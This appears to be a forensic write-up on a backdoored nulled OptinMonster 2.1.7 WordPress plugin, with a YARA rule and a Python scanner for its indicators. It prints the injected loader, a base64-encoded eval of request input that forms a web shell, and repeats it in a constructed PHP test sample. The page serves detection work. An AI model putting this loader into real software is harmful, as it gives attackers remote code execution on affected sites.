Nulled WordPress OptinMonster 2.1.7 Plugin
YARA rule for the backdoored build (the rule body as published lacked its enclosing braces, which YARA requires; nothing else was changed):

rule Nulled_OptinMonster_217
{
    meta:
        description = "Detects nulled OptinMonster 2.1.7 with backdoor"
        hash = "a4f3c8d9e2b1c7a5e9d3f2b1c8a7d4e2"
    strings:
        $s1 = "om_dbg" wide ascii
        $s2 = "94.102.61.78" ascii
        $s3 = "OptinMonster/NulledBot" ascii
        $s4 = "pre_http_request" ascii
    condition:
        all of them
}
The injected loader in the nulled plugin:

    $code = base64_decode('ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs='); // decodes to: eval($_REQUEST['cmd']);
    if (isset($_REQUEST['om_dbg'])) eval($code);

This plants a web shell reachable from any page request that sets the om_dbg parameter: full remote code execution. The nulled version also installs an hourly cron job that POSTs to http://94.102.61.78:8080/log.
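The detection logic from the YARA rule above, carried over into a small scanner so it can be run against a plugin directory and extended to the base64-wrapped eval pattern in the loader snippet. This is an added example written for this page, not code from OptinMonster or from the rule's author; the sample PHP files are constructed here from the indicators the page lists, and the directory layout and function names are assumptions for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Indicator strings taken from the page's YARA rule Nulled_OptinMonster_217.
INDICATORS = ["om_dbg", "94.102.61.78", "OptinMonster/NulledBot", "pre_http_request"]

# A base64 literal passed straight to base64_decode(), as in the page's loader snippet.
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")

# What we look for inside a decoded literal: eval() fed directly from request data.
SUSPICIOUS_DECODED = re.compile(r"eval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")


def decoded_payloads(source: str):
    """Return the decoded text of every base64_decode('...') literal in source."""
    out = []
    for m in B64_CALL.finditer(source):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return out


def scan_source(source: str) -> dict:
    """Evaluate one file's contents.

    'yara_match' mirrors the rule's 'all of them' condition; 'hidden_eval' lists
    decoded base64 literals that wrap an eval() of request input.
    """
    found = [s for s in INDICATORS if s in source]
    hidden_evals = [p for p in decoded_payloads(source) if SUSPICIOUS_DECODED.search(p)]
    yara_match = len(found) == len(INDICATORS)
    return {
        "indicators": found,
        "yara_match": yara_match,
        "hidden_eval": hidden_evals,
        "suspicious": yara_match or bool(hidden_evals),
    }


def scan_tree(root: Path) -> dict:
    """Scan every .php file under root; return {relative path: result} for suspicious files."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        result = scan_source(path.read_text(errors="replace"))
        if result["suspicious"]:
            hits[path.relative_to(root).as_posix()] = result
    return hits


# Constructed sample resembling the page's description of the nulled loader (not real plugin code).
SAMPLE_BACKDOOR = """<?php
add_filter('pre_http_request', 'om_dbg_filter');
$ua = 'OptinMonster/NulledBot';
$host = '94.102.61.78';
$code = base64_decode('ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs=');
if (isset($_REQUEST['om_dbg'])) eval($code);
"""

# Constructed benign sample: uses one indicator legitimately and decodes harmless text.
SAMPLE_CLEAN = """<?php
add_filter('pre_http_request', 'my_cache_filter', 10, 3);
echo base64_decode('aGVsbG8gd29ybGQ=');
"""


def demo() -> dict:
    """Write both samples into a temporary plugin tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "optin-monster").mkdir()
        (root / "optin-monster" / "loader.php").write_text(SAMPLE_BACKDOOR)
        (root / "my-cache").mkdir()
        (root / "my-cache" / "cache.php").write_text(SAMPLE_CLEAN)
        return scan_tree(root)


if __name__ == "__main__":
    for rel_path, result in demo().items():
        print(rel_path, result)
```

A single indicator such as pre_http_request is a normal WordPress filter hook, which is why the rule requires all four strings; the decoded-eval check catches the loader even when the other strings have been renamed. Point scan_tree at wp-content/plugins to run it against a live install.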
Security Forensics and Risk Analysis of Nulled WordPress Plugins: A Case Study of OptinMonster 2.1.7